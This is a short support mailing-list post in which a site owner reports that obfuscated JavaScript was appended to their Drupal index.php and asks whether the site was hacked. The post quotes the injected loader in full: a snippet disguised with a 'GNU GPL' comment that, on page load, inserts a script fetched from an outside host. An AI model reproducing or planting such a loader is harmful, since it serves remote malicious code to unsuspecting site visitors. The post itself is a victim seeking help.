[support] Hacked or not

[steven at vermoere.net]

Hello,

I've encounterd a strange problem.

One of me sites has a changed index.php. The date of the file changed and
the following lines were added at the end of the file:

/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r =
document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|\!|\^|@|#/ig,
''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type',
't^!^^e#&x!$@t)(@/!)(j@#$@a@)v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|\)|#|\(|&|\$|\!|\^/ig,
''));G2kfrz1an5r.setAttribute('src',
'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@&&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t at -^))f#@&m#.$$t@^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@#.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s at p$$@s$.^$$#c at o)m$@((!/!^a&#!!d@$u at l@t)$f#$$r@)!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d at a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@(&@.$(!!u!#k^!@/)!!$'.replace(/@|\)|\!|\(|\^|&|\$|#/ig,
''));G2kfrz1an5r.setAttribute('defer',
'd(&e)f(^e!r('.replace(/#|\)|&|@|\(|\!|\^|\$/ig,
''));G2kfrz1an5r.setAttribute('id',
'S$##0 at 9^&&q$!^(t at b@$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/\$|#|\^|\(|&|@|\)|\!/ig,
''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}

I have the impression this is encrypted javascript.

Is this site hacked ? And if yes, is this due to Drupal or server-side ?

Thank you

Steven